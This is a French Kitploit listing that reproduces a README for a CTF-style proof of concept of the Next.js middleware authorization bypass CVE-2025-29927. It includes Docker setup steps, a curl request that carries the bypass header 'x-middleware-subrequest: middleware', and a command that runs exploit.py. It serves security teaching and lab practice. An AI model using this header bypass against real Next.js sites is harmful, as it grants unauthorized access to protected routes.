Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-29927 — Preuve de concept de type CTF démontrant le contournement d'autorisation du middleware Next.js (CVE-2025-29927). Inclut une application Docker vulnérable et un script d'exploit pour récupérer le flag depuis une route protégée. | Kitploit
Outils/GitHubGitHub/mhamzakhattak/cve-2025-29927
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubmhamzakhattak/cve-2025-29927

CVE-2025-29927

Preuve de concept de type CTF démontrant le contournement d'autorisation du middleware Next.js (CVE-2025-29927). Inclut une application Docker vulnérable et un script d'exploit pour récupérer le flag depuis une route protégée.

Voir le dépôt
18il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-29927 - Contournement d'autorisation du middleware Next.js (PoC)

Ceci est une Capture The Flag (CTF) sous forme de preuve de concept pour la vulnérabilité Contournement d'autorisation du middleware Next.js (CVE-2025-29927). L'objectif est de contourner le middleware d'authentification et de récupérer le flag depuis la route /protected.


Résumé de la vulnérabilité

  • CVE : CVE-2025-29927
  • Type : Contournement d'autorisation
  • Composant : Middleware Next.js
  • Impact : Accès non autorisé aux routes protégées
  • Route cible du PoC : /protected
  • Comportement attendu : Les utilisateurs non autorisés sont redirigés vers /
  • Comportement vulnérable : L'utilisation d'une requête modifiée permet de contourner la redirection et d'accéder directement au contenu protégé

Configuration du PoC

1. Cloner le dépôt

git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker

2. Construire et exécuter l'application vulnérable

sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app

Cela démarrera l'application Next.js vulnérable sur http://IP:3000


Exploitation

1. Sans exploit

Essayez d'accéder à :

curl -i http://IP:3000/protected

Vous serez redirigé vers /.

 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected

2. Avec l'exploit

Utilisez le fichier exploit.py fourni pour contourner le middleware et accéder à la route protégée :

python3 exploit.py -url http://IP:3000

En cas de succès, vous récupérerez le flag depuis /protected.


Fichiers

  • Dockerfile - Construit l'application Next.js vulnérable
  • exploit.py - Exploite la vulnérabilité pour contourner l'authentification
  • pages/ - Contient les routes vulnérables /protected et /login
  • middleware.js - La logique du middleware vulnérable
  • README.md - Ce fichier

Avertissement

Ce PoC est destiné à des fins éducatives et de recherche uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.


🏁 Flag

Trouvez le flag en exploitant la vulnérabilité et en accédant à :

http://IP:3000/protected

Bonne chance ! 🏴‍☠️

Télécharger l’outil